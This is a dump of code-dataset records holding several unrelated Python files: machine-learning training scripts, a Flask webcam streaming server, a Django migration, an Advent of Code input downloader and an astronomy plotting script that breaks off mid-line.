text='Enter',command=inputpage).place(x=300, y=46)\n\n#name_enterb.pack()\n\n\n\n\n#label=Label(root, text='Welcome '+ name + ' to my Fianancial management App').place(x=20,y=170)\n\n#label2=Label(root, text= 'Click the button to be directed to your inputs').place(x=20, y=210)\n#homepage_button=Button(root, text='Inputs').place(x=20, y=250)\n\n#top1=label(root, text='Fianancial management App').grid(row=0,column=0)\n\n#initial savings\n#i_label=Label(root, text='Enter your initial savings').grid(row=1,column=0)\n#initial_savings=Entry(root, width=50).grid(row=1, column=1)\n\n#monthly income\n#label=Label(root, text='Enter your monthly income').grid(row=2,column=0)\n#monthyi=Entry(root, width=50).grid(row=2, column=1)\n\n#daily expense\n#m_label=Label(root, text='Enter your daily expense').grid(row=3,column=0)\n#daily_expense=Entry(root, width=50).grid(row=3, column=1)\n\nroot.mainloop()\n","sub_path":"page1.py","file_name":"page1.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"626315891","text":"'''\nImage Classification on CIFAR-10\n'''\n\nimport sys\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\n\nimport torchvision\nimport torchvision.transforms as transforms\n\nimport os\nimport argparse\nimport pickle\nimport numpy as np\nimport logging\nimport random\n\nfrom resnet import *\nfrom shakeshake_resnet import *\nfrom resnext import *\nfrom cutout import cutout\nfrom collections import OrderedDict\nfrom mixup import mixup_data, mixup_criterion\nfrom noise import noise_data\n\nparser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')\nparser.add_argument('--lr', default=0.2, type=float, help='learning rate')\nparser.add_argument('--model_arch', default=\"ResNet20\", help='specify the model class you want to use')\nparser.add_argument('--wd', default=1e-4, type=float, help='weight decay coefficient')\nparser.add_argument('--test', action='store_true', help='resume from checkpoint')\nparser.add_argument('--train', action='store_true', help='train the model')\nparser.add_argument('--train_batch_size', type=int, default=128)\nparser.add_argument('--test_batch_size', type=int, default=100)\nparser.add_argument('--nepochs', type=int, default=160)\nparser.add_argument('--seed', default=1234)\n\n################## These parameters are used in Cutout Model ####################\nparser.add_argument('--use_cutout', action='store_true', default=False)\nparser.add_argument('--use_post_cutout', action='store_true', default=False)\nparser.add_argument('--cutout_size', type=int, default=16)\nparser.add_argument('--cutout_prob', type=float, default=1)\nparser.add_argument('--cutout_inside', action='store_true', default=False)\n################## These parameters are used in Mix Up Model ####################\nparser.add_argument('--use_mix_up',action=\"store_true\", default=False)\nparser.add_argument('--use_uniform_mixup',action=\"store_true\", default=False)\nparser.add_argument('--mix_up_alpha', type=float, default=0.2)\nparser.add_argument('--prefix', type=str, default=\"exp\")\n\n################## These parameters are used in Noisy input ####################\nparser.add_argument('--noise_type', type=str, default=\"gauss\")\nparser.add_argument('--noise_train', action='store_true', default=False)\nparser.add_argument('--noise_test', action='store_true', default=False)\n\n################## Concate\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\nnp.random.seed(args.seed)\nrandom.seed(args.seed)\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nuse_cuda = device is 'cuda'\nbest_acc, start_epoch = 0, 0\n\nif args.noise_type is not None:\n if not args.noise_train:\n noise_func_train = noise_data(noise_type=args.noise_type, noise_prob=1.0)\n else:\n noise_func_train = noise_data(noise_type=args.noise_type, noise_prob=0.5)\n\n if not args.noise_test:\n noise_func_test = noise_data(noise_type=args.noise_type, noise_prob=1.0)\n else:\n noise_func_test = noise_data(noise_type=args.noise_type, noise_prob=0)\nelse:\n raise ValueError(\"unsupported noise type:{}\".format(args.noise_type))\n\nmeans = np.array([0.4914, 0.4822, 0.4465])\nstds = np.array([0.2470, 0.2435, 0.2616])\n\nif not args.use_cutout:\n transform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(means, stds),\n noise_func_train,\n ])\nelse:\n transform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n cutout(args.cutout_size,\n args.cutout_prob,\n args.cutout_inside),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261)),\n noise_func_train,\n ])\n\n\ntransform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261)),\n noise_func_test,\n])\n\n\ntrainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)\n\ntrainset = trainset\ntrainloader = torch.utils.data.DataLoader(\n trainset, batch_size=args.train_batch_size, shuffle=True, num_workers=2)\n\ntestset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)\ntestloader = torch.utils.data.DataLoader(\n testset, batch_size=args.test_batch_size, shuffle=False, num_workers=2)\n\nclasses = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')\n\n# Model\nnepochs = args.nepochs\nmodelname = args.model_arch\ncheckpoint_savename = './checkpoint/{}.ckpt'.format(modelname)\n\nnet = eval(modelname)()\n\nlogf = open(\"log_160_{}\".format(modelname), \"a+\")\n# Training\ndef train(epoch):\n logf.write('\\nEpoch: %d' % epoch)\n print('Epoch: %d' % epoch)\n net.train()\n train_loss, correct, total = 0, 0, 0\n batch_accs = []\n batch_losses = []\n for batch_idx, (inputs, targets) in enumerate(trainloader):\n inputs, targets = inputs.to(device), targets.to(device)\n if args.use_mix_up:\n optimizer.zero_grad()\n inputs, targets_a, targets_b, lam = mixup_data(args, inputs, targets,\n args.mix_up_alpha, args.use_uniform_mixup, use_cuda)\n inputs, targets_a, targets_b = map(Variable, (inputs,\n targets_a, targets_b))\n\n outputs = net(inputs)\n loss = mixup_criterion(criterion, outputs, targets_a, targets_b, lam)\n train_loss += loss.item()\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += (lam * predicted.eq(targets_a.data).cpu().sum().float()\n + (1 - lam) * predicted.eq(targets_b.data).cpu().sum().float())\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n else:\n inputs, targets = inputs.to(device), targets.to(device)\n optimizer.zero_grad()\n outputs = net(inputs)\n loss = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n\n train_loss += loss.item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n\n cur_loss = train_loss / (batch_idx + 1)\n acc = 100. * correct / total\n logf.write('[%d]Loss: %.3f | Acc: %.3f%% (%d/%d)\\n' % (batch_idx, cur_loss, acc, correct, total))\n if batch_idx % 100 == 0:\n print('[%d]Loss: %.3f | Acc: %.3f%% (%d/%d)' % (batch_idx, cur_loss, acc, correct, total))\n batch_accs.append(acc)\n batch_losses.append(cur_loss)\n acc = float(correct) / total\n print('Train Acc:{}'.format(acc))\n return np.mean(batch_losses), acc\n\n\ndef test(epoch):\n global best_acc\n net.eval()\n test_loss, correct, total = 0, 0, 0\n batch_errs, batch_accs, batch_losses = [], [], []\n\n for batch_idx, (inputs, targets) in enumerate(testloader):\n\n inputs, targets = inputs.to(device), targets.to(device)\n outputs = net(inputs)\n loss = criterion(outputs, targets)\n\n test_loss += loss.item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n\n loss = test_loss / (batch_idx + 1)\n acc = float(correct) / total\n logf.write('[%d] Val Loss: %.3f | Acc: %.3f%% (%d/%d)\\n'\n % (batch_idx, loss, acc, correct, total))\n batch_errs.append(1 - acc)\n batch_accs.append(acc)\n batch_losses.append(loss)\n\n acc = float(correct) / total\n print('Val Acc:{} ({}/{})'.format(acc, correct, total))\n return np.mean(batch_losses), acc\n\n\ntrain_err, train_loss, train_acc = [], [], []\nval_err, val_loss, val_acc = [], [], []\nprint('==> Building model..')\nnet = net.to(device)\n\ncriterion = nn.CrossEntropyLoss()\n\nif device == 'cuda':\n net = torch.nn.DataParallel(net)\n cudnn.benchmark = True\n\nif args.test:\n # Load checkpoint.\n print('==> Resuming from checkpoint {}..'.format(checkpoint_savename))\n assert os.path.isdir('checkpoint'), 'Error: no checkpoint directory found!'\n checkpoint = torch.load(checkpoint_savename)\n net.load_state_dict(checkpoint['net'])\n best_acc = checkpoint['acc']\n trained_epoch = checkpoint['epoch']\n tl, ta = test(trained_epoch)\n print('trained_epoch:{} saved_acc:{} test loss:{} test_acc:{}'.format(\n trained_epoch, best_acc, tl, ta))\n\nelif args.train:\n\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=args.wd)\n update_lr = {int(0.5 * nepochs): args.lr * 0.1, int(0.75 * nepochs): args.lr * 0.01}\n for epoch in range(0, nepochs):\n l, a = train(epoch)\n train_loss.append(l)\n train_acc.append(a)\n tl, ta = test(epoch)\n val_loss.append(tl)\n val_acc.append(ta)\n if epoch in update_lr:\n print(\"update learning rate to {}\".format(update_lr[epoch]))\n optimizer = optim.SGD(net.parameters(), lr=update_lr[epoch], momentum=0.9, weight_decay=args.wd)\n acc = ta\n state = {\n 'net': net.state_dict(),\n 'acc': acc,\n 'epoch': epoch,\n }\n if not os.path.isdir('checkpoint'):\n os.mkdir('checkpoint')\n torch.save(state, checkpoint_savename)\n best_acc = acc\n\n result = {\"train_loss\": train_loss, \"train_acc\": train_acc, \\\n \"val_loss\": val_loss, \"val_acc\": val_acc}\n\n fn = \"./output/{}_{}_start_epoch_{}_epochs_{}_noise{}.pk\".format(\n args.prefix, modelname, start_epoch, nepochs, args.noise_type)\n if not os.path.exists('./output/'):\n os.mkdir('./output/')\n with open(fn, 'wb') as fout:\n pickle.dump(result, fout)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"146719995","text":"\nheader = \"pou_paper_hess\"\npath = None\nskip_LHS = False \nLHS_batch = 7\nruns_per_proc = 1\n\n# Problem Conditions\nprob = \"alos\" #problem\ndim = 2 #problem dimension\n\n\n# Surrogate Settings\nstype = \"pouhess\" #\"pouhess\" #surrogate type\n\n### FOR POU SFCVT\nrtype = \"hess\"\nopt = 'L-BFGS-B' #'SLSQP'#\nlocal = False\n\n### FOR POU SFCVT\n# rtype = \"pousfcvt\"\n# opt = 'SLSQP' #for SFCVT constraint\n# local = True\n\n### FOR REGULAR SFCVT\n# rtype = \"sfcvt\"\n# opt = 'SLSQP' #for SFCVT constraint, \n# local = False\n# localswitch = False #fully global optimizer\n\n#Kriging\ncorr = \"squar_exp\" #kriging correlation\npoly = \"linear\" #kriging regression\ndelta_x = 1e-4 #1e-7\nextra = dim #gek extra points\nt0 = [1e-0]\ntb = [1e-5, 2e+1]\n\n#POU\nrscale = 5.5\nrho = 10 #POU parameter\n\n# Adaptive Sampling Settings\nnt0 = dim*10 #initial design size\nntr = dim*30 #number of points to add\nntot = nt0 + ntr #total number of points\nbatch = 1#dim*2 #batch size for refinement, as a percentage of ntr\nNerr = 5000*dim #number of test points to evaluate the error\npperb = batch\npperbk = int(ntr/LHS_batch)\nmstarttype = 2 # 0: No multistart\n # 1: Start at the best out of a number of samples\n # 2: Perform multiple optimizations\nif(mstarttype == 1): \n multistart = 50*dim\nif(mstarttype == 2):\n multistart = 5*dim\n\nif(pperb == 0):\n pperb = 1\n\n# Refinement Settings\n\n#Hess\nneval = 1+(dim+2)\nhess = \"neighborhood\"\ninterp = \"honly\"\n\n#Multi\nperturb = True\n\n#Deprecated\ncriteria = \"distance\"\nbpen = False\nobj = \"inv\"\nnscale = 10.0 #1.0 for 2D\nnmatch = dim\n\nrc_print = False#False\n","sub_path":"scratch/revision_scripts/alos2d_pou_hess_settings.py","file_name":"alos2d_pou_hess_settings.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"473067318","text":"from flask import Flask, render_template, Response\nimport cv2\nfrom threading import Thread\nimport time\n\nfrom src.camera.detect import FaceDetect\n\napp = Flask(__name__)\n\nclass VideoCamera(object):\n\n def __init__(self, index):\n self.video =cv2.VideoCapture(index)\n self.video.set(3, 640)\n self.video.set(4, 480)\n self.frame = None\n\n def __del__(self):\n self.video.release()\n\n def get_frame(self):\n success, image = self.video.read()\n if success:\n return image\n\n def get_frame_to_transfer(self):\n image = self.get_frame()\n self.frame = image.copy()\n # 因为opencv读取的图片并非jpeg格式,\n # 因此要用motion JPEG模式需要先将图片转码成jpg格式图片\n ret, jpeg = cv2.imencode('.jpg', image)\n return jpeg.tobytes()\n\n@app.route('/') # 主页\ndef index():\n # jinja2模板,具体格式保存在index.html文件中\n return render_template('index.html')\n\n\ndef gen(camera):\n face = FaceDetect()\n while True:\n # frame = camera.get_frame_to_transfer()\n image = camera.get_frame()\n image2 = face.detect(image)\n ret, jpeg = cv2.imencode('.jpg', image2)\n frame = jpeg.tobytes()\n # 使用generator函数输出视频流, 每次请求输出的content类型是image/jpeg\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n\\r\\n')\n\n\n@app.route('/video_feed') # 这个地址返回视频流响应\ndef video_feed():\n return Response(gen(cap0),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\nclass ReadVideoThread(Thread):\n def __init__(self, cap):\n super().__init__()\n self.cap = cap\n self.face = FaceDetect()\n\n def run(self):\n time.sleep(5)\n while True:\n frame = self.cap.frame\n if frame is not None:\n self.face.detect(frame)\n cv2.imshow(\"frame\", frame)\n if cv2.waitKey(1) == ord('q'):\n break\n else:\n pass\n cv2.waitKey(1)\n\n\nif __name__ == '__main__':\n cap0 = VideoCamera(0)\n app.run(host='0.0.0.0', debug=True, port=5000)\n","sub_path":"src/camera/cvtest.py","file_name":"cvtest.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"152452479","text":"# coding=utf-8\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests for compiler_opt.rl.policy_saver.\"\"\"\n\nimport json\nimport os\n\nimport tensorflow as tf\n\nfrom tf_agents.agents.behavioral_cloning import behavioral_cloning_agent\nfrom tf_agents.networks import q_rnn_network\nfrom tf_agents.specs import tensor_spec\nfrom tf_agents.trajectories import time_step\n\nfrom compiler_opt.rl import policy_saver\n\n\nclass PolicySaverTest(tf.test.TestCase):\n\n def setUp(self):\n super(PolicySaverTest, self).setUp()\n observation_spec = tf.TensorSpec(\n dtype=tf.int64, shape=(), name='callee_users')\n self._time_step_spec = time_step.time_step_spec(observation_spec)\n self._action_spec = tensor_spec.BoundedTensorSpec(\n dtype=tf.int64,\n shape=(),\n minimum=0,\n maximum=1,\n name='inlining_decision')\n self._network = q_rnn_network.QRnnNetwork(\n input_tensor_spec=self._time_step_spec.observation,\n action_spec=self._action_spec,\n lstm_size=(40,))\n\n def test_save_policy(self):\n test_agent = behavioral_cloning_agent.BehavioralCloningAgent(\n self._time_step_spec, self._action_spec, self._network,\n tf.compat.v1.train.AdamOptimizer())\n policy_dict = {\n 'saved_policy': test_agent.policy,\n 'saved_collect_policy': test_agent.collect_policy\n }\n test_policy_saver = policy_saver.PolicySaver(policy_dict=policy_dict)\n\n root_dir = self.get_temp_dir()\n test_policy_saver.save(root_dir)\n\n sub_dirs = tf.io.gfile.listdir(root_dir)\n self.assertCountEqual(['saved_policy', 'saved_collect_policy'], sub_dirs)\n\n for sub_dir in ['saved_policy', 'saved_collect_policy']:\n self.assertTrue(\n tf.io.gfile.exists(os.path.join(root_dir, sub_dir, 'saved_model.pb')))\n self.assertTrue(\n tf.io.gfile.exists(\n os.path.join(root_dir, sub_dir,\n 'variables/variables.data-00000-of-00001')))\n output_signature_fn = os.path.join(root_dir, sub_dir, 'output_spec.json')\n self.assertTrue(tf.io.gfile.exists(output_signature_fn))\n self.assertEqual([{\n 'logging_name': 'inlining_decision',\n 'tensor_spec': {\n 'name': 'StatefulPartitionedCall',\n 'port': 0,\n 'type': 'int64_t',\n 'shape': [1],\n }\n }], json.loads(tf.io.gfile.GFile(output_signature_fn).read()))\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"compiler_opt/rl/policy_saver_test.py","file_name":"policy_saver_test.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"578532810","text":"# -*- coding: utf-8 -*-\r\nimport pandas as pd\r\nbase = pd.read_csv('census.csv') # carrega arquivo de dados\r\nbase.describe() # mostra algumas estatisticas do arquivo (usar Crtl + enter)\r\n\r\nprevisores = base.iloc[:, 0:14].values # separa dados previsores da base de dados em uma variavel\r\nclasse = base.iloc[:, 14].values # separa vaores de saida da base de dados\r\n\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\nlabelencoder_previsores = LabelEncoder()\r\n\r\nprevisores[:, 1] = labelencoder_previsores.fit_transform(previsores[:, 1])\r\nprevisores[:, 3] = labelencoder_previsores.fit_transform(previsores[:, 3])\r\nprevisores[:, 5] = labelencoder_previsores.fit_transform(previsores[:, 5])\r\nprevisores[:, 6] = labelencoder_previsores.fit_transform(previsores[:, 6])\r\nprevisores[:, 7] = labelencoder_previsores.fit_transform(previsores[:, 7])\r\nprevisores[:, 8] = labelencoder_previsores.fit_transform(previsores[:, 8])\r\nprevisores[:, 9] = labelencoder_previsores.fit_transform(previsores[:, 9])\r\nprevisores[:, 13] = labelencoder_previsores.fit_transform(previsores[:, 13])\r\n\r\nfrom sklearn.compose import ColumnTransformer\r\nonehotencoder = ColumnTransformer([(\"Previsores\", OneHotEncoder(), [1, 3, 5, 6, 7, 8, 9, 13])], remainder = 'passthrough')\r\nprevisores = onehotencoder.fit_transform(previsores).toarray()\r\n\r\nlabelencoder_classe = LabelEncoder()\r\nclasse = labelencoder_classe.fit_transform(classe)\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\nscaler = StandardScaler()\r\nprevisores = scaler.fit_transform(previsores)\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nprevisores_treinamento, previsores_teste, classe_treinamento, classe_teste = train_test_split(previsores, classe, test_size=0.15, random_state=0)\r\n\r\n# importação da biblioteca\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nclassificador = Sequential()\r\nclassificador.add(Dense(units = 55, activation = 'relu', input_dim = 108))\r\nclassificador.add(Dense(units = 55, activation = 'relu'))\r\n\r\n# Camada de Saida\r\nclassificador.add(Dense(units = 1, activation = 'sigmoid'))\r\n\r\n# Compilacao da rede\r\nclassificador.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\r\nclassificador.fit(previsores_treinamento, classe_treinamento, batch_size = 10, epochs = 100)\r\n\r\n# criacao do classificador\r\nprevisoes = classificador.predict(previsores_teste)\r\nprevisoes = (previsoes > 0.5)\r\n\r\nfrom sklearn.metrics import confusion_matrix, accuracy_score\r\nprecisao = accuracy_score(classe_teste,previsoes)\r\nmatriz = confusion_matrix(classe_teste,previsoes)\r\n","sub_path":"Keras_Redes_Neurais_Census.py","file_name":"Keras_Redes_Neurais_Census.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"595233083","text":"from torch import nn\n\nclass DCAE_Conv2D(nn.Module):\n def __init__(self, chnum_in):\n super(DCAE_Conv2D, self).__init__()\n print('AutoEncoderCov2D')\n self.chnum_in = chnum_in\n fea_num_x1 = 16*4\n fea_num_x2 = 32*4\n fea_num_x3 = 64*4\n fea_num_x4 = 128*4\n self.encoder = nn.Sequential(\n nn.Conv2d(self.chnum_in, fea_num_x1, (4, 4), stride=2, padding=1),\n nn.BatchNorm2d(fea_num_x1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Conv2d(fea_num_x1, fea_num_x2, (4, 4), stride=2, padding=1),\n nn.BatchNorm2d(fea_num_x2),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Conv2d(fea_num_x2, fea_num_x3, (4, 4), stride=2, padding=1),\n nn.BatchNorm2d(fea_num_x3),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Conv2d(fea_num_x3, fea_num_x4, (4, 4), stride=2, padding=1),\n nn.BatchNorm2d(fea_num_x4),\n nn.LeakyReLU(0.2, inplace=True)\n )\n self.decoder = nn.Sequential(\n nn.ConvTranspose2d(fea_num_x4, fea_num_x3, (4, 4), stride=2, padding=1),\n nn.BatchNorm2d(fea_num_x3),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(fea_num_x3, fea_num_x2, (4, 4), stride=2, padding=1),\n nn.BatchNorm2d(fea_num_x2),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(fea_num_x2, fea_num_x1, (4, 4), stride=2, padding=1),\n nn.BatchNorm2d(fea_num_x1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(fea_num_x1, self.chnum_in, (4, 4), stride=2, padding=1),\n nn.Sigmoid()\n )\n def forward(self, x):\n f = self.encoder(x)\n output = self.decoder(f)\n return output","sub_path":"DCAE/dcae_conv2d.py","file_name":"dcae_conv2d.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"284077910","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('frontend', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='customer',\n name='is_active',\n field=models.BooleanField(default=True, verbose_name='active'),\n ),\n migrations.AddField(\n model_name='customergroup',\n name='is_active',\n field=models.BooleanField(default=True, verbose_name='active'),\n ),\n ]\n","sub_path":"crm/frontend/migrations/0002_auto_20151110_0759.py","file_name":"0002_auto_20151110_0759.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"540890596","text":"import sys, os, requests, pickle, datetime\n\nAVAILABLE = datetime.datetime.today().day + 1\n\n# set up session cookie\ntoken = str()\nwith open('token', 'r') as f:\n token = f.read().strip()\n\nsession = requests.Session()\ncookies = {\"session\": token}\nbase_url = 'https://adventofcode.com/2019/day/'\n\ndef day_x(day):\n return session.get(base_url + f'{day}/input', cookies=cookies).text\n\nif __name__ == \"__main__\":\n days = []\n if len(sys.argv) > 1:\n days = sys.argv[1:]\n else:\n days = [day for day in range(1, AVAILABLE)]\n\n for day in days: \n if isinstance(day, str):\n if not day.isdigit():\n continue\n day = int(day)\n if 0 < day < AVAILABLE:\n if os.path.exists(f\"{day}.in\"):\n continue\n input = day_x(day)\n with open(f\"{day}.in\", 'w') as f:\n f.write(input)\n else:\n print(f\"input for day {day} is not available yet...\")\n\n","sub_path":"input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"57713470","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('content', '0007_auto_20140820_1152'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='article',\n options={'ordering': ('-issue__order',), 'verbose_name': 'Yaz\\u0131', 'verbose_name_plural': 'Yaz\\u0131lar'},\n ),\n migrations.AlterModelOptions(\n name='editoraction',\n options={'ordering': ('-time',)},\n ),\n migrations.AlterModelOptions(\n name='photo',\n options={'verbose_name': 'Foto\\u011fraf', 'verbose_name_plural': 'Foto\\u011fraflar'},\n ),\n migrations.AlterModelOptions(\n name='userarticle',\n options={'verbose_name': 'okuyucu yaz\\u0131s\\u0131', 'verbose_name_plural': 'okuyucu yaz\\u0131lar\\u0131'},\n ),\n migrations.AddField(\n model_name='photo',\n name='photographer',\n field=models.ForeignKey(related_name=b'article_photos', blank=True, to='content.Author', null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"solfasol/content/migrations/0008_auto_20140821_1419.py","file_name":"0008_auto_20140821_1419.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"186542884","text":"################################################################################\n### Author: Tiago Castro, Pierluigi Monaco ###\n### ###\n################################################################################\nfrom astropy.io import fits\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nimport numpy as np\nimport healpy as hp\nimport sys\nimport filenames\n\nif len(sys.argv)<2:\n print(\"Usage: pyton {} [my input file]\".format(sys.argv[0]))\n sys.exit(0)\ntry: \n input = __import__(sys.argv[1], globals(), locals(), [], 0)\nexcept ModuleNotFoundError:\n print(\"input file not found\")\n print(\"Usage: pyton {} [my input file]\".format(sys.argv[0]))\n sys.exit(0)\n\nprint(\"# Running plot_dndz.py with {}\".format(sys.argv[1]))\n\nif not input.PLOT:\n print(\"Plots are not required, exiting...\")\n sys.exit(0)\n\n# special behaviour\nlabd='lookup'\nlabs='complete'\nsecond_dndz_fname=None\n#second_dndz_fname=input.project+'NumberCounts/dndz_flagship_8614_BenSC8_m3_smL5_truez.fits'\nCHECK_WITH_RANDOM=True\nCOMPLETENESS=True\n\n# survey footprint in equatorial coordinate\nfootprint_res, footprint_zrange, sky_fraction, footprint = input.read_footprint()\nsky_coverage=input.sqdegonthesky * sky_fraction\nprint(\"This survey covers {} sq deg\".format(sky_coverage))\ndel footprint\n\nfname = filenames.dndz(input)\nprint(\"Reading dndz from file {}\".format(fname))\ndndz=fits.getdata(fname)\n\nfig=plt.figure(figsize=(8, 8))\nplt.suptitle(filenames.exclude_dir(fname))\n\ngs = gridspec.GridSpec(2, 1, height_ratios=[2.5, 1], hspace=0)\n\npanel1 = plt.subplot(gs[0])\npanel2 = plt.subplot(gs[1])\n\npanel1.set_xlim([footprint_zrange[0]-0.1,footprint_zrange[1]+0.1])\npanel2.set_xlim([footprint_zrange[0]-0.1,footprint_zrange[1]+0.1])\nif input.lf_model=='1':\n panel1.set_ylim([0, 1e4])\nelif input.lf_model=='3':\n panel1.set_ylim([0, 0.55e4])\npanel2.set_yscale('linear')\npanel2.set_ylim([0.85,1.15])\npanel2.set_xlabel(r'redshift')\npanel1.set_ylabel(r'$dn/dz$, deg$^{-2}$ $(\\Delta z)^{-1}$')\npanel2.set_ylabel(r'residuals vs model')\n#uuu=panel1.set_xticklabels('',visible=False)\nplt.tight_layout(pad=1.5)\n\n# redshift binning for computing dn/dz\nztab = np.append(dndz['z_lower'],dndz['z_upper'][-1])\n\nNmodel=[]\nfor z1,z2 in zip(ztab[:-1],ztab[1:]):\n if z1<0.1:\n Nmodel.append(0.)\n else:\n Nmodel.append(input.Pozzetti_dndz(z1,z2)/input.deltazbin)\nNmodel=np.asarray(Nmodel)\npos=Nmodel>0\npanel1.plot(dndz['z_center'],Nmodel,label='model',c='k')\npanel2.plot(dndz['z_center'],np.ones_like(Nmodel),c='k')\n\npanel1.plot(dndz['z_center'],dndz['N_gal']/sky_coverage/input.deltazbin,label=labd,c='red')\npanel2.plot(dndz['z_center'][pos],dndz['N_gal'][pos]/sky_coverage/input.deltazbin/Nmodel[pos],c='red')\npanel1.plot(dndz['z_center'],dndz['N_gal_gaus']/sky_coverage/input.deltazbin,label='smoothed '+labd,c='orange')\npanel2.plot(dndz['z_center'][pos],dndz['N_gal_gaus'][pos]/sky_coverage/input.deltazbin/Nmodel[pos],c='orange')\n\npanel1.plot(dndz['z_center'],dndz['N_cen']/sky_coverage/input.deltazbin,'--',label=labd+', centrals',c='red')\npanel1.plot(dndz['z_center'],(dndz['N_gal']-dndz['N_cen'])/sky_coverage/input.deltazbin,':',label=labd+', satellites',c='red')\n\n\nif second_dndz_fname is not None:\n print(\"Reading second dndz from file {}\".format(second_dndz_fname))\n dndz2 = fits.getdata(second_dndz_fname)\n panel1.plot(dndz2['z_center'],dndz2['N_gal']/sky_coverage/input.deltazbin,label=labs,c='b')\n panel1.plot(dndz2['z_center'],dndz2['N_cen']/sky_coverage/input.deltazbin,'--',label=labs+', centrals',c='b')\n panel1.plot(dndz2['z_center'],(dndz2['N_gal']-dndz2['N_cen'])/sky_coverage/input.deltazbin,':',label=labs+', satellites',c='b')\n panel2.plot(dndz2['z_center'][pos],dndz2['N_gal'][pos]/sky_coverage/input.deltazbin/Nmodel[pos],c='b')\n\n\nif CHECK_WITH_RANDOM:\n print(\"Reading random catalog {}...\".format(filenames.random(input)))\n random = fits.getdata(filenames.random(input))\n\n Ng=np.histogram(random[input.redshift_key], bins=ztab)[0]/sky_coverage/input.deltazbin/input.alpha\n panel1.plot(dndz['z_center'],Ng,'-.',label='from random',c='cyan')\n panel2.plot(dndz['z_center'][pos],Ng[pos]/Nmodel[pos],'-.',c='cyan')\n\n if (not input.apply_dataselection_to_random) & (input.selection_random_tag is not None):\n print(\"Reading random selection {}...\".format(filenames.selection_random(input))) \n sel = fits.getdata(filenames.selection_random(input))['SELECTION']\n Ng=np.histogram(random[input.redshift_key][sel], 